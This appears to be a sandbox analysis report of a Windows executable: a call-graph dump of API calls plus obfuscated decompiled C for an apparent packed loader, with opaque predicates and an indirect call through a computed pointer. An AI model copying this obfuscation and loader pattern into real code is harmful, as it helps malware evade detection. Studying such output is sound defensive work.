8614->8619 8615->8619 8616 37cc2f 8618 37a83b __freea 20 API calls 8616->8618 8617->8605 8618->8605 8619->8616 8620 37ac09 12 API calls 8619->8620 8621 37cc0e 8620->8621 8621->8616 8622 37cc1d WideCharToMultiByte 8621->8622 8622->8616 8623 37cc5d 8622->8623 8624 37a83b __freea 20 API calls 8623->8624 8624->8605 8626 37a935 _abort 5 API calls 8625->8626 8627 37ac30 8626->8627 8628 37ac60 8627->8628 8629 37ac39 LCMapStringEx 8627->8629 8636 37ac91 8628->8636 8633 37ac80 8629->8633 8634 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8633->8634 8635 37ac8b 8634->8635 8635->8605 8635->8613 8635->8614 8637 37a935 _abort 5 API calls 8636->8637 8638 37acb8 8637->8638 8639 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8638->8639 8640 37ac79 LCMapStringW 8639->8640 8640->8633 8642 37b20f ___BuildCatchObject 8641->8642 8649 37b1a4 EnterCriticalSection 8642->8649 8644 37b219 8650 37b26e 8644->8650 8648 37b232 ___BuildCatchObject 8648->8372 8649->8644 8662 37b98e 8650->8662 8652 37b2bc 8653 37b98e 26 API calls 8652->8653 8654 37b2d8 8653->8654 8655 37b98e 26 API calls 8654->8655 8656 37b2f6 8655->8656 8657 37b226 8656->8657 8658 37a8fb _free 20 API calls 8656->8658 8659 37b23a 8657->8659 8658->8657 8676 37b1ec LeaveCriticalSection 8659->8676 8661 37b244 8661->8648 8663 37b99f 8662->8663 8664 37b99b 8662->8664 8665 37b9a6 8663->8665 8668 37b9b9 ___scrt_get_show_window_mode 8663->8668 8664->8652 8666 379a46 __dosmaperr 20 API calls 8665->8666 8667 37b9ab 8666->8667 8669 37998a ___std_exception_copy 26 API calls 8667->8669 8668->8664 8670 37b9e7 8668->8670 8671 37b9f0 8668->8671 8669->8664 8672 379a46 __dosmaperr 20 API calls 8670->8672 8671->8664 8674 379a46 __dosmaperr 20 API calls 8671->8674 8673 37b9ec 8672->8673 8675 37998a ___std_exception_copy 26 API calls 8673->8675 8674->8673 8675->8664 8676->8661 8677 37dccc 8678 37dcd8 ___BuildCatchObject 8677->8678 8702 37e593 8678->8702 8681 37dcdf 8682 37dd08 8681->8682 8740 37df6f IsProcessorFeaturePresent 8681->8740 8688 37dd47 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 8682->8688 8713 37d4f6 8682->8713 8685 37d49a _abort 5 API calls 8685->8688 8686 37dd27 ___BuildCatchObject 8687 37dda7 8717 37e08a 8687->8717 8688->8687 8744 37c4bb 8688->8744 8690 37ddad 8721 371ed0 8690->8721 8703 37e59c 8702->8703 8751 37e2de IsProcessorFeaturePresent 8703->8751 8707 37e5ad 8708 37e5b1 8707->8708 8762 3818d7 8707->8762 8708->8681 8711 37e5c8 8711->8681 8714 37d50d 8713->8714 8715 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8714->8715 8716 37d537 8715->8716 8716->8685 8716->8686 8898 37f290 8717->8898 8719 37e09d GetStartupInfoW 8720 37e0b0 8719->8720 8720->8690 8722 372039 8721->8722 8723 371f2b 8721->8723 8726 37238a WideCharToMultiByte CreateFileA 8722->8726 8727 372198 8722->8727 8724 37205d 8723->8724 8725 371f3c 8723->8725 8724->8722 8733 3720b5 CreateMutexA 8724->8733 8900 373a60 8725->8900 8729 37260c ExitProcess 8726->8729 8918 385750 8727->8918 8731 372204 8932 387550 8731->8932 8940 3885e0 8733->8940 8737 372180 8737->8722 8739 37237c 8739->8729 8741 37df85 ___scrt_get_show_window_mode 8740->8741 8742 37e02d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8741->8742 8743 37e077 8742->8743 8743->8681 8745 37c4e3 try_get_function 8744->8745 8746 37d941 _abort 8744->8746 8745->8687 8747 379e50 _abort 38 API calls 8746->8747 8750 37d952 8747->8750 8748 37a85b _abort 38 API calls 8749 37d97c 8748->8749 8750->8748 8752 37e304 8751->8752 8753 37f596 8752->8753 8754 37f59b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 8753->8754 8773 3806be 8754->8773 8757 37f5a9 8757->8707 8759 37f5b1 8760 37f5bc 8759->8760 8787 3806fa 8759->8787 8760->8707 8828 3823ff 8762->8828 8765 37f5bf 8766 37f5d9 8765->8766 8767 37f5c8 8765->8767 8766->8708 8768 37f709 ___vcrt_uninitialize_ptd 6 API calls 8767->8768 8769 37f5cd 8768->8769 8770 3806fa ___vcrt_uninitialize_locks DeleteCriticalSection 8769->8770 8771 37f5d2 8770->8771 8894 3809b5 8771->8894 8774 3806c7 8773->8774 8776 3806f0 8774->8776 8778 37f5a5 8774->8778 8791 380935 8774->8791 8777 3806fa ___vcrt_uninitialize_locks DeleteCriticalSection 8776->8777 8777->8778 8778->8757 8779 37f6d6 8778->8779 8809 38084a 8779->8809 8781 37f6e0 8782 37f6eb 8781->8782 8814 3808f8 8781->8814 8782->8759 8784 37f6f9 8785 37f706 8784->8785 8819 37f709 8784->8819 8785->8759 8788 380724 8787->8788 8789 380705 8787->8789 8788->8757 8790 38070f DeleteCriticalSection 8789->8790 8790->8788 8790->8790 8796 380729 8791->8796 8793 38094f 8794 38096c InitializeCriticalSectionAndSpinCount 8793->8794 8795 380958 8793->8795 8794->8795 8795->8774 8799 380759 8796->8799 8801 38075d try_get_function 8796->8801 8797 38077d 8800 380789 GetProcAddress 8797->8800 8797->8801 8799->8797 8799->8801 8802 3807c9 8799->8802 8800->8801 8801->8793 8803 3807f1 LoadLibraryExW 8802->8803 8804 3807e6 8802->8804 8805 38080d GetLastError 8803->8805 8808 380825 8803->8808 8804->8799 8807 380818 LoadLibraryExW 8805->8807 8805->8808 8806 38083c FreeLibrary 8806->8804 8807->8808 8808->8804 8808->8806 8810 380729 try_get_function 5 API calls 8809->8810 8811 380864 8810->8811 8812 38087c TlsAlloc 8811->8812 8813 38086d 8811->8813 8813->8781 8815 380729 try_get_function 5 API calls 8814->8815 8816 380912 8815->8816 8817 38092c TlsSetValue 8816->8817 8818 380921 8816->8818 8817->8818 8818->8784 8820 37f713 8819->8820 8821 37f719 8819->8821 8823 380884 8820->8823 8821->8782 8824 380729 try_get_function 5 API calls 8823->8824 8825 38089e 8824->8825 8826 3808b5 TlsFree 8825->8826 8827 3808aa 8825->8827 8826->8827 8827->8821 8831 38241c 8828->8831 8832 382418 8828->8832 8829 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8830 37e5ba 8829->8830 8830->8711 8830->8765 8831->8832 8834 38237d 8831->8834 8832->8829 8835 382389 ___BuildCatchObject 8834->8835 8846 37b1a4 EnterCriticalSection 8835->8846 8837 382390 8847 382038 8837->8847 8839 38239f 8840 3823ae 8839->8840 8860 382211 GetStartupInfoW 8839->8860 8871 3823ca 8840->8871 8843 3823bf ___BuildCatchObject 8843->8831 8846->8837 8848 382044 ___BuildCatchObject 8847->8848 8849 382068 8848->8849 8850 382051 8848->8850 8874 37b1a4 EnterCriticalSection 8849->8874 8852 379a46 __dosmaperr 20 API calls 8850->8852 8853 382056 8852->8853 8854 37998a ___std_exception_copy 26 API calls 8853->8854 8856 382060 ___BuildCatchObject 8854->8856 8855 3820a0 8882 3820c7 8855->8882 8856->8839 8857 382074 8857->8855 8875 381f89 8857->8875 8861 38222e 8860->8861 8863 3822c0 8860->8863 8862 382038 27 API calls 8861->8862 8861->8863 8864 382257 8862->8864 8866 3822c7 8863->8866 8864->8863 8865 382285 GetFileType 8864->8865 8865->8864 8867 3822ce 8866->8867 8868 382311 GetStdHandle 8867->8868 8869 382379 8867->8869 8870 382324 GetFileType 8867->8870 8868->8867 8869->8840 8870->8867 8893 37b1ec LeaveCriticalSection 8871->8893 8873 3823d1 8873->8843 8874->8857 8876 37a89e _abort 20 API calls 8875->8876 8878 381f9b 8876->8878 8877 381fa8 8879 37a8fb _free 20 API calls 8877->8879 8878->8877 8885 37aba7 8878->8885 8881 381ffa 8879->8881 8881->8857 8892 37b1ec LeaveCriticalSection 8882->8892 8884 3820ce 8884->8856 8886 37a935 _abort 5 API calls 8885->8886 8887 37abce 8886->8887 8888 37abec InitializeCriticalSectionAndSpinCount 8887->8888 8889 37abd7 8887->8889 8888->8889 8890 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8889->8890 8891 37ac03 8890->8891 8891->8878 8892->8884 8893->8873 8895 3809e4 8894->8895 8897 3809be 8894->8897 8895->8766 8896 3809ce FreeLibrary 8896->8897 8897->8895 8897->8896 8899 37f2a7 8898->8899 8899->8719 8899->8899 8901 373ac0 8900->8901 8907 371fcd 8900->8907 8943 372940 8901->8943 8903 373b16 8949 371000 8903->8949 8908 374040 8907->8908 8909 3740b6 8908->8909 8910 3743eb 8908->8910 8917 374369 8909->8917 8974 373660 8909->8974 8911 374414 CreateFileMappingA 8910->8911 8910->8917 8911->8917 8914 3885e0 3 API calls 8915 374294 8914->8915 8983 371280 8915->8983 8917->8722 8919 3857c8 8918->8919 8920 385e0e 8918->8920 8921 3857d9 8919->8921 8922 385bd2 8919->8922 8920->8731 8988 371420 8921->8988 8923 385bf9 8922->8923 8928 385e57 8922->8928 8923->8920 8924 385c16 8923->8924 8926 385cac GetModuleHandleA MultiByteToWideChar 8924->8926 8929 385910 8926->8929 8928->8920 8930 385ec3 GetModuleFileNameA 8928->8930 8929->8731 8929->8920 8931 385eac 8930->8931 8931->8928 8933 387d67 8932->8933 8939 3722aa 8932->8939 8934 387dab 8933->8934 8935 387ebc GetCurrentActCtx 8933->8935 8936 387dd3 CloseHandle 8934->8936 8934->8939 8935->8939 8937 3885e0 3 API calls 8936->8937 8938 387eb4 8937->8938 8938->8939 8939->8739 8941 388792 WideCharToMultiByte ReleaseMutex CreateFileA 8940->8941 8942 388656 8940->8942 8941->8942 8942->8737 8944 372d34 8943->8944 8945 3729a4 8943->8945 8944->8945 8946 372d5d FindFirstFileA GetModuleHandleA 8944->8946 8945->8903 8947 372630 3 API calls 8946->8947 8948 372e4a 8947->8948 8948->8903 8950 3711b1 8949->8950 8951 371063 8949->8951 8955 372630 8950->8955 8951->8950 8963 3883a0 8951->8963 8953 37110c 8967 373370 8953->8967 8960 3726b7 8955->8960 8961 37269d 8955->8961 8956 3727e4 8971 384e80 8956->8971 8957 372878 ReadFile 8959 372841 8957->8959 8959->8907 8960->8956 8960->8957 8961->8960 8962 372790 FindNextFileA 8961->8962 8962->8961 8964 3883fb 8963->8964 8966 38840d 8963->8966 8965 388572 GetCurrentActCtx 8964->8965 8964->8966 8965->8964 8966->8953 8968 3733e0 8967->8968 8969 3733eb 8967->8969 8968->8969 8970 37352b SetHandleInformation 8968->8970 8969->8950 8970->8950 8972 384f0b GetCommandLineA 8971->8972 8973 384eec 8971->8973 8972->8973 8973->8959 8975 3736c1 8974->8975 8976 373941 8974->8976 8977 3736e5 8975->8977 8978 37379f CreateFileMappingA CreateMutexA 8975->8978 8976->8914 8977->8976 8979 37391b 8977->8979 8980 372940 5 API calls 8978->8980 8979->8977 8981 372940 5 API calls 8979->8981 8980->8979 8982 373a44 8981->8982 8982->8976 8984 3712e9 VirtualAlloc 8983->8984 8986 371367 8983->8986 8985 371409 8984->8985 8985->8917 8986->8985 8987 3713a8 SetHandleInformation 8986->8987 8987->8986 8989 371da7 8988->8989 8993 371476 8988->8993 8990 371dc6 CloseHandle 8989->8990 8989->8993 8991 371e0a 8990->8991 8992 371e70 GetCurrentProcessId 8991->8992 8991->8993 8992->8993 8993->8929

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                            			E00371ED0() {
                                                                                                                                                                                                                                                                            				signed int* _t348;
                                                                                                                                                                                                                                                                            				signed int* _t395;
                                                                                                                                                                                                                                                                            				int _t401;
                                                                                                                                                                                                                                                                            				signed int* _t408;
                                                                                                                                                                                                                                                                            				signed int _t419;
                                                                                                                                                                                                                                                                            				signed int _t423;
                                                                                                                                                                                                                                                                            				signed int _t436;
                                                                                                                                                                                                                                                                            				signed int _t439;
                                                                                                                                                                                                                                                                            				signed int* _t451;
                                                                                                                                                                                                                                                                            				signed int* _t464;
                                                                                                                                                                                                                                                                            				intOrPtr _t503;
                                                                                                                                                                                                                                                                            				signed int* _t505;
                                                                                                                                                                                                                                                                            				intOrPtr _t511;
                                                                                                                                                                                                                                                                            				signed int* _t556;
                                                                                                                                                                                                                                                                            				signed int* _t578;
                                                                                                                                                                                                                                                                            				signed int* _t610;
                                                                                                                                                                                                                                                                            				signed int* _t612;
                                                                                                                                                                                                                                                                            				signed int* _t630;
                                                                                                                                                                                                                                                                            				signed int* _t658;
                                                                                                                                                                                                                                                                            				signed int _t659;
                                                                                                                                                                                                                                                                            				signed int* _t664;
                                                                                                                                                                                                                                                                            				void* _t665;
                                                                                                                                                                                                                                                                            				void* _t666;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t664 = _t665 - 0x68;
                                                                                                                                                                                                                                                                            				_t666 = _t665 - 0xe0;
                                                                                                                                                                                                                                                                            				_t664[0x19] = 0x40d3a8;
                                                                                                                                                                                                                                                                            				 *(_t664[0x19] + 0x11c) = _t664[0x1e];
                                                                                                                                                                                                                                                                            				_t664[0x16] = 0x2674;
                                                                                                                                                                                                                                                                            				_t664[0x13] = 0x2622;
                                                                                                                                                                                                                                                                            				_t664[0x17] = 0x253b;
                                                                                                                                                                                                                                                                            				_t664[0x18] = 0x2622;
                                                                                                                                                                                                                                                                            				_t664[0x15] = 0x27b9;
                                                                                                                                                                                                                                                                            				_t664[0x14] = 0x253b;
                                                                                                                                                                                                                                                                            				if(_t664[0x15] != (_t664[0x14] ^ 0x000003bc)) {
                                                                                                                                                                                                                                                                            					if(_t664[0x16] < _t664[0x13] - 0x82) {
                                                                                                                                                                                                                                                                            						if( *(_t664[0x19] + 0xbadbb1) == (_t664[0x14] &  *(_t664[0x19] + 0xf4))) {
                                                                                                                                                                                                                                                                            							_t408 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							if( *0x0040D420 >= (_t408[0x2eb70c] *  *(_t664[0x19] + 0x98) ^  *0x40d478)) {
                                                                                                                                                                                                                                                                            								_t664[4] = _t664[0x13] ^  *(_t664[0x19] + 0xe0);
                                                                                                                                                                                                                                                                            								_t664[5] = _t664[0x18] - _t664[0x18] ^  *(_t664[0x19] + 0xe0);
                                                                                                                                                                                                                                                                            								_t511 =  *0x40d440; // 0x0
                                                                                                                                                                                                                                                                            								_t630 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								_t92 =  &(_t630[0xc]); // 0x0
                                                                                                                                                                                                                                                                            								_t664[6] = _t511 +  *((intOrPtr*)(_t664[0x19] + 0xb8)) -  *_t92;
                                                                                                                                                                                                                                                                            								CreateMutexA(_t664[4], _t664[5], _t664[6]);
                                                                                                                                                                                                                                                                            								 *(_t664 - 4) = (_t664[0x18] ^ _t664[0x18]) * 0x26d4;
                                                                                                                                                                                                                                                                            								 *_t664 = _t664[0x17] |  *(_t664[0x19] + 0x30);
                                                                                                                                                                                                                                                                            								_t664[1] = _t664[0x18] * 0x00002687 &  *(_t664[0x19] + 0x10c);
                                                                                                                                                                                                                                                                            								_t419 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								_t664[2] = _t419;
                                                                                                                                                                                                                                                                            								_t664[3] =  *(_t664[0x19] + 0x80) *  *(_t664[0x19] + 0xbadbb1);
                                                                                                                                                                                                                                                                            								_t423 = E003885E0( *(_t664 - 4),  *_t664, _t664[1], _t664[2], _t664[3]);
                                                                                                                                                                                                                                                                            								_t666 = _t666 + 0x14;
                                                                                                                                                                                                                                                                            								_t664[0x17] = _t423;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t664[0x17] = _t664[0x17] ^ 0x00000313;
                                                                                                                                                                                                                                                                            						_t664[0x13] = _t664[0x13] ^ 0x000001b4;
                                                                                                                                                                                                                                                                            						_t664[0x18] = _t664[0x18] + 0x11;
                                                                                                                                                                                                                                                                            						_t664[0x15] = _t664[0x15] - 0x2b3;
                                                                                                                                                                                                                                                                            						_t664[0x17] = _t664[0x17] ^ 0x000000cd;
                                                                                                                                                                                                                                                                            						_t664[0xd] = _t664[0x14] + 0x2a;
                                                                                                                                                                                                                                                                            						_t664[0xe] = _t664[0x16] + 0x60;
                                                                                                                                                                                                                                                                            						_t664[0xf] = _t664[0x13] - 0x122;
                                                                                                                                                                                                                                                                            						_t664[0x10] = _t664[0x16] - 0x10f;
                                                                                                                                                                                                                                                                            						_t664[0x11] = _t664[0x19];
                                                                                                                                                                                                                                                                            						_t664[0x12] = _t664[0x15] ^ 0x00000335;
                                                                                                                                                                                                                                                                            						_t664[0x18] = E00373A60(_t664[0xd], _t664[0xe], _t664[0xf], _t664[0x10], _t664[0x11], _t664[0x12]);
                                                                                                                                                                                                                                                                            						_t664[7] = _t664[0x18] - 0x181;
                                                                                                                                                                                                                                                                            						_t664[8] = _t664[0x15] ^ 0x00000324;
                                                                                                                                                                                                                                                                            						_t664[9] = _t664[0x15] + 0x16e;
                                                                                                                                                                                                                                                                            						_t664[0xa] = _t664[0x17] - 0xbd;
                                                                                                                                                                                                                                                                            						_t664[0xb] = _t664[0x16] - 0x10f;
                                                                                                                                                                                                                                                                            						_t436 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t664[0xc] = _t436;
                                                                                                                                                                                                                                                                            						_push(_t664[0xc]);
                                                                                                                                                                                                                                                                            						_push(_t664[0xb]);
                                                                                                                                                                                                                                                                            						_push(_t664[0xa]);
                                                                                                                                                                                                                                                                            						_push(_t664[9]);
                                                                                                                                                                                                                                                                            						_push(_t664[8]);
                                                                                                                                                                                                                                                                            						_push(_t664[7]);
                                                                                                                                                                                                                                                                            						_t439 = E00374040();
                                                                                                                                                                                                                                                                            						_t666 = _t666 + 0x30;
                                                                                                                                                                                                                                                                            						_t664[0x16] = _t439;
                                                                                                                                                                                                                                                                            						_t664[0x15] = _t664[0x15] + 0x2b3;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t664[0x19] + 0x9c)) = 0xec981;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_t664[0x15] < (_t664[0x16] ^ 0x000002f4)) {
                                                                                                                                                                                                                                                                            					_t664[0x14] = _t664[0x14] -  *0x0040D434 *  *0x40d4c8;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x5c) =  *(_t664[0x19] + 0xac) *  *(_t664[0x19] + 0xd0) - 0x2674;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x58) = _t664[0x16] & _t664[0x15] | _t664[0x13];
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x54) = (_t664[0x18] |  *(_t664[0x19] + 0xbadc19)) * 0x253b;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x50) = _t664[0x14] ^ _t664[0x17];
                                                                                                                                                                                                                                                                            					_t451 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x4c) = ( *0x0040D454 |  *_t451) - 0x2628;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x48) = _t664[0x14] - _t664[0x18] + 0x26d4;
                                                                                                                                                                                                                                                                            					_t556 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t235 =  &(_t556[0x32]); // 0x38f7708d
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x44) = (_t664[0x13] |  *(_t664[0x19] + 0x8c)) +  *_t235;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x40) =  *((intOrPtr*)(_t664[0x19] + 0xbadc39)) - _t664[0x15] +  *((intOrPtr*)(_t664[0x19] + 0xbadc39));
                                                                                                                                                                                                                                                                            					WideCharToMultiByte( *(_t664 - 0x5c),  *(_t664 - 0x58),  *(_t664 - 0x54),  *(_t664 - 0x50),  *(_t664 - 0x4c),  *(_t664 - 0x48),  *(_t664 - 0x44),  *(_t664 - 0x40));
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x78) = (_t664[0x14] |  *(_t664[0x19] + 0x44)) * _t664[0x17];
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x74) = _t664[0x16] -  *(_t664[0x19] + 0xe0) | 0x000026d4;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x70) = ( *(_t664[0x19] + 0xbadbc1) ^ 0x0000253b) -  *(_t664[0x19] + 0x80);
                                                                                                                                                                                                                                                                            					_t348 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t270 =  &(_t348[0x38]); // 0x6
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x6c) = (_t664[0x17] |  *_t270) - 0x25a0;
                                                                                                                                                                                                                                                                            					_t464 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x68) = _t664[0x15] + _t464[0x21];
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x64) = _t664[0x16] +  *((intOrPtr*)(_t664[0x19] + 0x64));
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x60) =  *(_t664[0x19] + 0xd0) |  *0x40d49c;
                                                                                                                                                                                                                                                                            					CreateFileA( *(_t664 - 0x78),  *(_t664 - 0x74),  *(_t664 - 0x70),  *(_t664 - 0x6c),  *(_t664 - 0x68),  *(_t664 - 0x64),  *(_t664 - 0x60));
                                                                                                                                                                                                                                                                            					_t578 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t664[0x14] = _t664[0x14] | _t578[0x2eb6ec] -  *(_t664[0x19] + 0x30) &  *0x00FBB00D;
                                                                                                                                                                                                                                                                            					_t658 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t664[0x17] = _t664[0x17] |  *(_t664[0x19] + 0x10c) - _t658[0x43] - 0x0000253b;
                                                                                                                                                                                                                                                                            					 *(_t664[0x19] + 0xbadc19) = ( *(_t664[0x19] + 0xbadc59) | 0x0000283a) * 0x26e5 +  *(_t664[0x19] + 0xbadc19);
                                                                                                                                                                                                                                                                            					_t664[0x16] = _t664[0x16] ^ (_t664[0x17] | _t664[0x14]) - 0x00002674;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t664[0x16] = _t664[0x16] + 0x9e;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x20) = _t664[0x19];
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x1c)) = _t664[0x18] + 0x5e;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x18) = _t664[0x18] ^ 0x000000af;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x14) = _t664[0x17] ^ 0x00000031;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x10)) = _t664[0x16] + 0x3b;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0xc) = _t664[0x13] ^ 0x00000236;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 8)) = _t664[0x14] + 0x2a;
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t664 - 8)));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0xc));
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t664 - 0x10)));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0x14));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0x18));
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t664 - 0x1c)));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0x20));
                                                                                                                                                                                                                                                                            					_t664[0x18] = E00385750();
                                                                                                                                                                                                                                                                            					_t664[0x16] = _t664[0x16] - 0x2a;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664[0x19] + 0xa8)) = 0x3c0670;
                                                                                                                                                                                                                                                                            					_t664[0x15] = _t664[0x15] ^ 0x00000221;
                                                                                                                                                                                                                                                                            					_t664[0x18] = _t664[0x18] - 0x81;
                                                                                                                                                                                                                                                                            					_t664[0x14] = _t664[0x14] + 0x1aa;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x3c)) = _t664[0x16] - 0x74;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x38)) = _t664[0x13] - 0x1fe;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x34)) = _t664[0x17] - 0xc3;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x30)) = _t664[0x18] - 0x2b3;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x2c) = _t664[0x16] ^ 0x00000d3a;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x28)) = _t664[0x15] - 0x33;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x24) = _t664[0x19];
                                                                                                                                                                                                                                                                            					_t664[0x17] = E00387550( *((intOrPtr*)(_t664 - 0x3c)),  *((intOrPtr*)(_t664 - 0x38)),  *((intOrPtr*)(_t664 - 0x34)),  *((intOrPtr*)(_t664 - 0x30)),  *(_t664 - 0x2c),  *((intOrPtr*)(_t664 - 0x28)),  *(_t664 - 0x24));
                                                                                                                                                                                                                                                                            					_t664[0x13] = _t664[0x13] - 0x163;
                                                                                                                                                                                                                                                                            					_t664[0x18] = _t664[0x18] - 0x191;
                                                                                                                                                                                                                                                                            					_t610 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					if(_t610[0x2b] <= 0xa03) {
                                                                                                                                                                                                                                                                            						_t612 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t659 =  *0x40d3d8; // 0x0
                                                                                                                                                                                                                                                                            						_t395 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t664[0x19] + 0x14) = _t659 ^ _t612[0x39] ^ _t395[0xa] ^  *(_t664[0x19] + 0x14);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t505 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t185 =  &(_t505[0x35]); // 0x1212000
                                                                                                                                                                                                                                                                            						 *(_t664[0x19] + 0xa4) =  *_t185;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if( *0x40d404 < 0x2b66) {
                                                                                                                                                                                                                                                                            						_t503 =  *0x40d4bc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t401 =  *( *(_t664[0x19] + 0xa4))(_t503,  *((intOrPtr*)(_t664[0x19] + 0xcc)) +  *0x40d4c0,  *(_t664[0x19] + 0x11c)); // executed
                                                                                                                                                                                                                                                                            						 *(_t664[0x19] + 0xf8) = _t401;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				ExitProcess( *(_t664[0x19] + 0xf8));
                                                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                                                            0x00371ed1
                                                                                                                                                                                                                                                                            0x00371ed5
                                                                                                                                                                                                                                                                            0x00371edc
                                                                                                                                                                                                                                                                            0x00371ee9
                                                                                                                                                                                                                                                                            0x00371eef
                                                                                                                                                                                                                                                                            0x00371ef6
                                                                                                                                                                                                                                                                            0x00371efd
                                                                                                                                                                                                                                                                            0x00371f04
                                                                                                                                                                                                                                                                            0x00371f0b
                                                                                                                                                                                                                                                                            0x00371f12
                                                                                                                                                                                                                                                                            0x00371f25
                                                                                                                                                                                                                                                                            0x00371f36
                                                                                                                                                                                                                                                                            0x00372077
                                                                                                                                                                                                                                                                            0x0037208d
                                                                                                                                                                                                                                                                            0x003720af
                                                                                                                                                                                                                                                                            0x003720c1
                                                                                                                                                                                                                                                                            0x003720d3
                                                                                                                                                                                                                                                                            0x003720e1
                                                                                                                                                                                                                                                                            0x003720ee
                                                                                                                                                                                                                                                                            0x003720f4
                                                                                                                                                                                                                                                                            0x003720f7
                                                                                                                                                                                                                                                                            0x00372106
                                                                                                                                                                                                                                                                            0x00372118
                                                                                                                                                                                                                                                                            0x00372124
                                                                                                                                                                                                                                                                            0x00372140
                                                                                                                                                                                                                                                                            0x00372143
                                                                                                                                                                                                                                                                            0x00372148
                                                                                                                                                                                                                                                                            0x00372164
                                                                                                                                                                                                                                                                            0x0037217b
                                                                                                                                                                                                                                                                            0x00372180
                                                                                                                                                                                                                                                                            0x00372183
                                                                                                                                                                                                                                                                            0x00372183
                                                                                                                                                                                                                                                                            0x003720af
                                                                                                                                                                                                                                                                            0x00371f3c
                                                                                                                                                                                                                                                                            0x00371f45
                                                                                                                                                                                                                                                                            0x00371f51
                                                                                                                                                                                                                                                                            0x00371f5a
                                                                                                                                                                                                                                                                            0x00371f66
                                                                                                                                                                                                                                                                            0x00371f72
                                                                                                                                                                                                                                                                            0x00371f7b
                                                                                                                                                                                                                                                                            0x00371f84
                                                                                                                                                                                                                                                                            0x00371f90
                                                                                                                                                                                                                                                                            0x00371f9b
                                                                                                                                                                                                                                                                            0x00371fa1
                                                                                                                                                                                                                                                                            0x00371fad
                                                                                                                                                                                                                                                                            0x00371fd0
                                                                                                                                                                                                                                                                            0x00371fe2
                                                                                                                                                                                                                                                                            0x00371fee
                                                                                                                                                                                                                                                                            0x00371ff9
                                                                                                                                                                                                                                                                            0x00372005
                                                                                                                                                                                                                                                                            0x00372011
